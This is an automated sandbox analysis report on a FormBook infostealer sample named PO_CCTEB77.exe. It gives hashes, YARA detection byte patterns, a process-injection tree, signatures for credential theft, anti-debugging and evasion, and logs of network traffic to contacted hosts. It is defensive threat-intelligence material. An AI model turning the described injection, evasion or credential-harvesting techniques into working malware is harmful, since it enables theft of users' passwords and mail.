Windows Analysis Report
PO_CCTEB77.exe

Overview

General Information

Sample Name: PO_CCTEB77.exe
Analysis ID: 1352162
MD5: 7391f0c0a4cd63ecedef46dbb072542c
SHA1: d48186b338445f25fc92c9aede867010be3c3b8f
SHA256: 5f409d66b5e4403f5c05ff19c88acd96d0ee3a0511c4ebca73abe01ced6eb5b6
Tags: exe, Formbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • PO_CCTEB77.exe (PID: 5628 cmdline: C:\Users\user\Desktop\PO_CCTEB77.exe MD5: 7391F0C0A4CD63ECEDEF46DBB072542C)
    • PO_CCTEB77.exe (PID: 3008 cmdline: C:\Users\user\Desktop\PO_CCTEB77.exe MD5: 7391F0C0A4CD63ECEDEF46DBB072542C)
      • AQhPMwWbqUlSTgiqGOPNvqG.exe (PID: 5784 cmdline: "C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\isoburn.exe MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • AQhPMwWbqUlSTgiqGOPNvqG.exe (PID: 1600 cmdline: "C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4676 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.PO_CCTEB77.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.PO_CCTEB77.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2aef3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.PO_CCTEB77.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.PO_CCTEB77.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a0f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x162d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
            No Snort rule has matched


            AV Detection

            Source: PO_CCTEB77.exe, ReversingLabs: Detection: 70%
            Source: PO_CCTEB77.exe, Virustotal: Detection: 66%
            Source: PO_CCTEB77.exe, Joe Sandbox ML: detected
            Source: PO_CCTEB77.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO_CCTEB77.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdb source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474515197.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: PO_CCTEB77.exe, 00000003.00000002.2154745222.0000000001338000.00000004.00000020.00020000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000002.4474515197.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000004.00000000.2077705276.0000000000BDE000.00000002.00000001.01000000.0000000D.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4474211062.0000000000BDE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_CCTEB77.exe, 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2156691093.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2154766470.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_CCTEB77.exe, PO_CCTEB77.exe, 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000005.00000003.2156691093.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2154766470.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: xoUr.pdbSHA256 source: PO_CCTEB77.exe
            Source: Binary string: firefox.pdb source: isoburn.exe, 00000005.00000003.2317674797.000000000838A000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2368356075.000000000844A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xoUr.pdb source: PO_CCTEB77.exe
            Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 5_2_0301C280 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 4x nop then pop edi (5_2_03011A10)
            Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 4x nop then xor eax, eax (5_2_030099C0)
            Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 4x nop then pop edi (5_2_0300E2BF)
            Source: Joe Sandbox View, IP Address: 37.97.254.27
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Sat, 02 Dec 2023 17:47:34 GMT; Server: Apache; Upgrade: h2,h2c; Connection: Upgrade, close; Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT; Accept-Ranges: bytes; Content-Length: 583; Vary: Accept-Encoding; Content-Type: text/html
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Date: Sat, 02 Dec 2023 17:47:45 GMT; Server: Apache; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Date: Sat, 02 Dec 2023 17:47:47 GMT; Server: Apache; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Date: Sat, 02 Dec 2023 17:47:50 GMT; Server: Apache; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Content-Length: 626; Connection: close; Date: Sat, 02 Dec 2023 17:47:53 GMT; Server: Apache
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Sat, 02 Dec 2023 17:48:43 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Vary: Accept-Encoding; ETag: W/"64f9f107-377d8"; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Sat, 02 Dec 2023 17:48:46 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Vary: Accept-Encoding; ETag: W/"64f9f107-377d8"; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Sat, 02 Dec 2023 17:48:49 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Vary: Accept-Encoding; ETag: W/"64f9f107-377d8"; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Sat, 02 Dec 2023 17:48:51 GMT; Content-Type: text/html; Content-Length: 227288; Connection: close; Vary: Accept-Encoding; ETag: "64f9f107-377d8"
2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 35 37 70 78 20 30 20 30 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 33 36 34 33 36 34 3b 66 6f 6e 74 3a 31 32 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Dec 2023 17:48:59 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Dec 2023 17:49:01 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Dec 2023 17:49:04 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Dec 2023 17:49:06 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sat, 02 Dec 2023 17:49:20 GMT Content-Type: text/html Content-Length: 178 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Dec 2023 17:49:27 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Dec 2023 17:49:30 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Dec 2023 17:49:32 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Dec 2023 17:49:35 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:49:55 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:49:58 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:01 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:03 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 02 Dec 2023 17:50:09 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-02T17:50:14.8569239Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 02 Dec 2023 17:50:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2023-12-02T17:50:14.8569239Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 02 Dec 2023 17:50:15 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-02T17:50:20.8952429Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 02 Dec 2023 17:50:18 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-02T17:50:23.5807063Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 02 Dec 2023 17:50:33 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 02 Dec 2023 17:50:38 GMT | Server: Apache | X-Powered-By: PHP/7.4.33 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 02 Dec 2023 17:50:41 GMT | Server: Apache | X-Powered-By: PHP/7.4.33 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
